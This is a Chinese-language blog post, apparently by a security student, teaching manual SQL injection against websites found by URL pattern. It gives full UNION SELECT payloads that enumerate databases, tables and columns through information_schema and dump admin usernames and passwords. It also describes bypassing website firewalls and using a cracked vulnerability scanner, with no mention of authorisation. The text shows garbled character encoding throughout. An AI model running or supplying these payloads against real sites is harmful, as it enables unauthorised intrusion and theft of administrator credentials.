溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶服務(wù)條款》

sql注入學(xué)習(xí)經(jīng)驗(yàn)

發(fā)布時(shí)間:2020-06-26 12:48:42 來(lái)源:網(wǎng)絡(luò) 閱讀:1155 作者:qwe岳 欄目:安全技術(shù)

本人是一名***新手,信息安全專業(yè)的學(xué)生一直在學(xué)習(xí)關(guān)于安全方面的理論學(xué)習(xí),主要進(jìn)行的是網(wǎng)站的搭建,但自從接觸了web***之后才發(fā)現(xiàn)自己以前搭建的網(wǎng)站真是漏洞百出,從而也愛(ài)上了***的學(xué)習(xí),今天就和大家分享一下我的學(xué)習(xí)成果,有什么不好的地方歡迎大家提意見(jiàn)!

   今天主要是講一講sql注入,sql注入的原理和危害就不多說(shuō)了,大家百度一下就可以了,給大家講一講我的實(shí)踐經(jīng)驗(yàn)。

   sql注入的方法(get參數(shù))

    說(shuō)復(fù)雜了沒(méi)用其實(shí)就兩種,工具注入與手工注入

   (一)選擇網(wǎng)站是否能進(jìn)行sql注入(一般使用火狐瀏覽器比較好——方便)

    (1)先查看URL頁(yè)面為http://xxx.com/xxx/id=23 這樣的頁(yè)面或者為偽靜態(tài)的url也可進(jìn)行注入。       ·

    (2)在url后輸入 

         and 1=1返回頁(yè)面正常

         and 1=2返回頁(yè)面錯(cuò)誤

        

         or 1=1返回頁(yè)面錯(cuò)誤

         or 1=2返回頁(yè)面正常

         這樣的網(wǎng)站就有注入漏洞

現(xiàn)在的網(wǎng)站基本都有網(wǎng)站防火墻(帶有防sql注入功能)這時(shí)可用‘工具注入中轉(zhuǎn)生成器’來(lái)重新生成一個(gè)頁(yè)面(注意打開(kāi)這個(gè)頁(yè)面要用iis或小旋風(fēng)),這樣就可以繞過(guò)網(wǎng)站安全狗了。

然后在新生成頁(yè)面進(jìn)行操作。

         and 1=1返回頁(yè)面正常

         and 1=2返回頁(yè)面錯(cuò)誤

        

         or 1=1返回頁(yè)面錯(cuò)誤

         or 1=2返回頁(yè)面正常

這樣就可以進(jìn)行下一步了。

   (一)個(gè)人經(jīng)驗(yàn)一般應(yīng)先進(jìn)行目錄的掃描,為什么呢?

    因?yàn)橄葢?yīng)該找到網(wǎng)站后臺(tái)的登錄界面,如果連登陸界面都無(wú)法找到,就算知道了管理員的用戶 名密碼又有什么用呢。

    可以手工查找,就是猜名稱,一般為admin|login|user等asp、php、aspx、jsp后綴的,這種方 法有點(diǎn)傻,一般用工具進(jìn)行網(wǎng)站遍歷。

    掃描工具:工具在附件里都有。我一般先使用御劍的掃描工具,但御劍的歲數(shù)畢竟不小了,也 沒(méi)有后續(xù)的更新,所以有些網(wǎng)站目錄是無(wú)法遍歷出來(lái)的,這是只能用一些牛逼的工具了。工具burpsuite(都說(shuō)是***神器,我也一直在用,功能挺強(qiáng)大的,可以進(jìn)行網(wǎng)站爬行與網(wǎng)站目錄的遍歷)還有就是Acunetix Web Vulnerability Scanner這款軟件也是非常強(qiáng)大的,現(xiàn)在出到10了,網(wǎng)上破解版。具體使用教程請(qǐng)自行百度。

   (二)進(jìn)行注入

         可用工具啊D、明小子、pangolin穿山甲、sqlmap等工具進(jìn)行注入,今天主要講解手工注入。

         手工注入:

      1、order by 1.....100判斷表數(shù)

         若頁(yè)面返回正常則說(shuō)明這個(gè)數(shù)字小于表數(shù),依次遞加,最好取中進(jìn)行測(cè)試節(jié)省時(shí)間,最后一個(gè)           正確的為表數(shù),如20正常,21不正常,則表數(shù)為20

      2、   http://xxx.com/xxx.php?id=23 and 1=2 UNION SELECT                                    1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

         顯示3,7數(shù)字

      3、   將3或7替換為database()、version()、user()、@@version——compile_os

            報(bào)基本信息  (1)database():數(shù)據(jù)庫(kù)名-------abc

                (2)version():數(shù)據(jù)庫(kù)版本--------5.1.63-community

                (3)user():數(shù)據(jù)庫(kù)用戶----------shsjk@localhost

                 (4)@@version——compile_os:操作系統(tǒng)--------win32

      4、表名查詢   http://xxx/xxx.php?id=23 and 1=2 UNION SELECT                            1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20from                information_schema.tables where table_schema=0x616263(此處為數(shù)據(jù)庫(kù)名,可用小葵          轉(zhuǎn)換工具轉(zhuǎn)換為Hex值)

         查詢結(jié)果為:wz_jj_admin,wz_jj_article,wz_jj_p_w_upload,wz_jj_class,wz_jj_en_admin,wz_jj_en_article,wz_jj_en_p_w_upload,wz_jj_en_class,wz_jj_en_key,wz_jj_en_links,wz_jj_en_message,wz_jj_key,wz_jj_links,wz_jj_message 

      5、分析表wz_jj_admin 查找表的列名

         http://xxx.com/xxx.php?id=23 and 1=2 UNION SELECT                            1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.columns where table_name=0x777A5F6A6A5F61646D696E

        結(jié)果為:uid , ad_username,ad_password,ad_power,ad_intro

      6、查找用戶名,密碼http://xxx.com/xxx.php?id=23 and 1=2 UNION SELECT 1,2,group_concat(ad_username,0x5c,ad_password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from wz_jj_admin

      7、結(jié)果為:admin  admin888 這樣就成功了

這只是簡(jiǎn)單的sql注入,后續(xù)的參數(shù)注入有post注入、cookie注入,請(qǐng)耐心等待!

向AI問(wèn)一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI